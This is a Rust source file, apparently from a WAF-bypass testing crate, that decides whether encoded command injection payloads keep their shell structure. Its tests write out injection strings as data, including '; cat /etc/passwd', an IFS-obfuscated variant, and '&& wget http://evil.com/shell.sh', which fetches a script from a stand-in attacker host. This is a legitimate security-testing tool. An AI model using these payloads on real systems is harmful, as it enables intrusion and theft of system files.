wafrift-oracle 0.2.6

Payload validity oracles for SQL, SSRF, path traversal, command injection, and template injection.
Documentation
//! Command injection payload oracle.
//!
//! Command injection payloads require three structural elements:
//! 1. **A separator** — `;`, `|`, `&&`, `||`, `` ` ``, `$()` that breaks out of the original command
//! 2. **A command** — actual executable to run (`cat`, `whoami`, `id`, `curl`, etc.)
//! 3. **Optional arguments** — file paths, URLs, flags
//!
//! If encoding destroys any separator or the command name, the payload
//! becomes inert text that the shell will reject or ignore.

use crate::ascii_scan::contains_ascii_insensitive;
use crate::traits::PayloadOracle;
use serde::Deserialize;
use std::sync::OnceLock;

/// Command injection oracle that validates shell command structure preservation.
pub struct CmdiOracle;

// ──────────────────────────────────────────────
//  TOML-loaded CMDI oracle rules
// ──────────────────────────────────────────────

/// Compile-time embedded TOML rules for CMDI oracle.
const CMD_ORACLE_TOML: &str = include_str!("../rules/cmd/oracle.toml");

/// Command separator definition from TOML.
#[derive(Debug, Clone, Deserialize)]
struct CmdSeparator {
    pattern: String,
    #[allow(dead_code)]
    description: String,
}

/// Shell command definition from TOML.
#[derive(Debug, Clone, Deserialize)]
struct ShellCommand {
    name: String,
    #[allow(dead_code)]
    description: String,
}

/// Shell trick definition from TOML.
#[derive(Debug, Clone, Deserialize)]
struct ShellTrick {
    pattern: String,
    #[allow(dead_code)]
    description: String,
}

/// Root structure for oracle.toml.
#[derive(Debug, Clone, Deserialize)]
struct CmdOracleRules {
    #[serde(default)]
    cmd_separator: Vec<CmdSeparator>,
    #[serde(default)]
    shell_command: Vec<ShellCommand>,
    #[serde(default)]
    shell_trick: Vec<ShellTrick>,
}

/// Parse the embedded TOML rules once at first access.
fn get_rules() -> &'static CmdOracleRules {
    static RULES: OnceLock<CmdOracleRules> = OnceLock::new();
    RULES.get_or_init(|| {
        toml::from_str(CMD_ORACLE_TOML).unwrap_or_else(|_| {
            CmdOracleRules { cmd_separator: Vec::new(), shell_command: Vec::new(), shell_trick: Vec::new() }
        })
    })
}

/// Get command separators that break out of the current shell context.
fn cmd_separators() -> &'static [String] {
    static CACHE: OnceLock<Vec<String>> = OnceLock::new();
    CACHE.get_or_init(|| {
        get_rules()
            .cmd_separator
            .iter()
            .map(|s| s.pattern.clone())
            .collect()
    })
}

/// Get common commands used in injection payloads.
fn shell_commands() -> &'static [String] {
    static CACHE: OnceLock<Vec<String>> = OnceLock::new();
    CACHE.get_or_init(|| {
        get_rules()
            .shell_command
            .iter()
            .map(|c| c.name.clone())
            .collect()
    })
}

/// Get shell variable substitution and IFS tricks.
fn shell_tricks() -> &'static [String] {
    static CACHE: OnceLock<Vec<String>> = OnceLock::new();
    CACHE.get_or_init(|| {
        get_rules()
            .shell_trick
            .iter()
            .map(|t| t.pattern.clone())
            .collect()
    })
}

/// Returns true if `text` contains `word` as a whole word.
///
/// Byte-level case-insensitive: NEVER allocates a lowercase copy of
/// the input. Pre-fix this called `text.to_ascii_lowercase()` (and
/// `part.to_ascii_lowercase()` in the inner loop) once per shell
/// command tested — a 10 MB payload × 40 commands triggered ~400 MB
/// of temporary heap growth on every oracle call. Now O(text.len())
/// scan with constant extra space.
fn contains_word(text: &str, word: &str) -> bool {
    let word_bytes = word.as_bytes();
    if word_bytes.is_empty() {
        return false;
    }
    let bytes = text.as_bytes();
    let is_separator = |b: u8| -> bool {
        matches!(
            b,
            b' ' | b'\t'
                | b'\n'
                | b'\r'
                | b';'
                | b'|'
                | b'&'
                | b'`'
                | b'$'
                | b'('
                | b')'
                | b'<'
                | b'>'
                | b'\''
                | b'"'
                | 0
        )
    };
    let is_word_boundary_after = |b: u8| -> bool {
        is_separator(b) || matches!(b, b'-' | b'/' | b'(' | b'$')
    };
    let mut i = 0;
    while i < bytes.len() {
        // Skip separators.
        while i < bytes.len() && is_separator(bytes[i]) {
            i += 1;
        }
        // Strip leading slashes (whole-word `cat` matches `/cat`).
        while i < bytes.len() && bytes[i] == b'/' {
            i += 1;
        }
        let part_start = i;
        while i < bytes.len() && !is_separator(bytes[i]) {
            i += 1;
        }
        let part = &bytes[part_start..i];
        if part.len() >= word_bytes.len() {
            // Case-insensitive prefix match — byte-level, no alloc.
            let prefix_match = part[..word_bytes.len()]
                .iter()
                .zip(word_bytes.iter())
                .all(|(a, b)| a.eq_ignore_ascii_case(b));
            if prefix_match {
                if part.len() == word_bytes.len() {
                    return true;
                }
                if is_word_boundary_after(part[word_bytes.len()]) {
                    return true;
                }
            }
        }
    }
    false
}

/// Checks whether a payload contains command injection structure.
fn has_cmdi_structure(payload: &str) -> bool {
    let payload = payload.trim_end_matches(['\0', '\u{FFFD}']);

    // Must have at least one separator (`.contains` is memchr-backed — faster than a naive byte loop).
    let has_separator = cmd_separators().iter().any(|sep| payload.contains(sep.as_str()));

    // Must reference at least one command as a whole word
    let has_command = shell_commands()
        .iter()
        .any(|cmd| contains_word(payload, cmd));

    // Shell tricks indicate structural complexity (separator is still required)
    let has_shell_trick = shell_tricks().iter().any(|trick| payload.contains(trick));

    // Also check for common target paths
    let has_target_path = contains_ascii_insensitive(payload, "/etc/passwd")
        || contains_ascii_insensitive(payload, "/etc/shadow")
        || contains_ascii_insensitive(payload, "/bin/")
        || contains_ascii_insensitive(payload, "/tmp/")
        || contains_ascii_insensitive(payload, "http://")
        || contains_ascii_insensitive(payload, "https://");

    // Valid CMDI: separator is always required. Then either a recognized
    // command, a shell trick, or a target path (like /etc/passwd) makes it structural.
    has_separator && (has_command || has_shell_trick || has_target_path)
}

impl PayloadOracle for CmdiOracle {
    fn is_semantically_valid(&self, _original: &str, transformed: &str) -> bool {
        has_cmdi_structure(transformed)
    }

    fn name(&self) -> &'static str {
        "CMDI"
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn semicolon_cat_valid() {
        let oracle = CmdiOracle;
        assert!(oracle.is_semantically_valid("; cat /etc/passwd", "; cat /etc/passwd",));
    }

    #[test]
    fn pipe_ls_valid() {
        let oracle = CmdiOracle;
        assert!(oracle.is_semantically_valid("| ls -la", "| ls -la"));
    }

    #[test]
    fn double_ampersand_valid() {
        let oracle = CmdiOracle;
        assert!(oracle.is_semantically_valid(
            "&& wget http://evil.com/shell.sh",
            "&& wget http://evil.com/shell.sh",
        ));
    }

    #[test]
    fn backtick_subshell_valid() {
        let oracle = CmdiOracle;
        assert!(oracle.is_semantically_valid("`id`", "`id`"));
    }

    #[test]
    fn dollar_paren_subshell_valid() {
        let oracle = CmdiOracle;
        assert!(oracle.is_semantically_valid("$(whoami)", "$(whoami)"));
    }

    #[test]
    fn ifs_trick_valid() {
        let oracle = CmdiOracle;
        assert!(
            oracle.is_semantically_valid(
                ";${IFS}cat${IFS}/etc/passwd",
                ";${IFS}cat${IFS}/etc/passwd",
            )
        );
    }

    #[test]
    fn encoded_separator_invalid() {
        let oracle = CmdiOracle;
        // URL encoding destroyed the semicolon separator
        assert!(!oracle.is_semantically_valid("; cat /etc/passwd", "%3B cat /etc/passwd",));
    }

    #[test]
    fn encoded_command_still_valid() {
        let oracle = CmdiOracle;
        // Separator preserved, command still readable
        assert!(oracle.is_semantically_valid("; cat /etc/passwd", "; cat /etc/passwd",));
    }

    #[test]
    fn plain_text_invalid() {
        let oracle = CmdiOracle;
        assert!(!oracle.is_semantically_valid("; cat /etc/passwd", "hello world"));
    }

    #[test]
    fn empty_invalid() {
        let oracle = CmdiOracle;
        assert!(!oracle.is_semantically_valid("; cat /etc/passwd", ""));
    }

    #[test]
    fn newline_separator_valid() {
        let oracle = CmdiOracle;
        assert!(oracle.is_semantically_valid("\nid", "\nid",));
    }

    #[test]
    fn or_pipe_valid() {
        let oracle = CmdiOracle;
        assert!(oracle.is_semantically_valid("|| curl evil.com", "|| curl evil.com"));
    }
}